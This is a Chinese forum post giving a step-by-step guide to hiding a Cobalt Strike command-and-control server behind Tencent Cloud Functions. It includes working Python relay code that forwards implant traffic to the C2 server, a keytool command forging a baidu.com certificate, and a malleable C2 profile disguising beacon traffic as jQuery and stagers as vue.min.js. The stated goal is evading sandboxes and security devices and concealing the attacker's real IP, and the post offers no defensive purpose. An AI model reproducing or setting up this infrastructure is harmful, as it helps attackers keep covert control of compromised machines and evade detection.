本帖最后由 zhaorong 于 2022-6-9 17:18 编辑
C2服务器隐藏
木马丢进沙箱可动态监测木马反弹地址(C2服务器)使用C2隐藏技术可以有效防止暴露
真实IP及安全设备的检测。
云函数
CS马被执行后,流量直接走向腾讯云的api,然后py函数会根据传入的流量作为中间人对CS服务端
进行请求并获取返回结果后返回请求获取的数据信息。
1、创建云函数
腾讯云函数服务-函数管理进行新建-从头开始
在脚本内填入c2服务器地址
# -*- coding: utf8 -*-
import json,requests,base64
def main_handler(event, context):
C2='http://<C2服务器地址>' # 这里可以使用 HTTP、HTTPS~下角标~
path=event['path']
headers=event['headers']
print(event)
if event['httpMethod'] == 'GET' :
resp=requests.get(C2+path,headers=headers,verify=False)
else:
resp=requests.post(C2+path,data=event['body'],headers=headers,verify=False)
print(resp.headers)
print(resp.content)
response={
"isBase64Encoded": True,
"statusCode": resp.status_code,
"headers": dict(resp.headers),
"body": str(base64.b64encode(resp.content))[2:-1]
}
return response
2、新建触发器
函数服务-函数名-触发管理-创建触发器(修触发别名/版本:$LATEST、触发方式:API网关触发)
进入函数api配置,更改路径为/,配置完发布api
3、配置CS profile
使用keytools生成证书文件,记住证书密码,要在profile配置
keytool -keystore CS.store -storepass PASSWORD -keypass PASSWORD -genkey -keya
lg RSA -alias baidu.com -dname "CN=ZhongGuo, OU=CC, O=CCSEC, L=BeiJing, ST=C
haoYang, C=CN"
profile 模板
set sample_name "fricky";
set sleeptime "3000";
set jitter "0";
set maxdns "255";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36";
https-certificate
{
set keystore "cobaltStrike.store"; //证书名
set password "PASSWORD"; //密码
## Option 3) Cobalt Strike Self-Signed Certificate
set C "US";
set CN "jquery.com";
set O "jQuery";
set OU "Certificate Authority";
set validity "365";
}
http-get
{
set uri "/api/getit";
client {
header "Accept" "*/*";
metadata {
base64;
prepend "SESSIONID=";
header "Cookie";
}
}
server {
header "Content-Type" "application/ocsp-response";
header "content-transfer-encoding" "binary";
header "Server" "Nodejs";
output {
base64;
print;
}
}
}
http-stager
{
set uri_x86 "/vue.min.js";
set uri_x64 "/bootstrap-2.min.js";
}
http-post {
set uri "/api/postit";
client {
header "Accept" "*/*";
id {
base64;
prepend "JSESSION=";
header "Cookie";
}
output {
base64;
print;
}
}
server
{
header "Content-Type" "application/ocsp-response";
header "content-transfer-encoding" "binary";
header "Connection" "keep-alive";
output {
base64;
print;
}
}
}
创建完成后,把证书和profile文件放入CS文件夹,使用./teamserver IP PASSWORD
c2.profile加载profile启动cs
4、CS
本地客户端连接,创建监听
这里只能创建80和443端口监听。
填入的HTTP Hosts、HTTP Hosts(stager)为service-qri1tvhl-130420863
8.bj.apigw.tencentcs.com,去除http://和PORT
打开CS web日志,访问云函数地址,发现CS的日志出现流量,至此云函数配置成功
上线
上线后可以发现外连地址一直在变化
|
楼主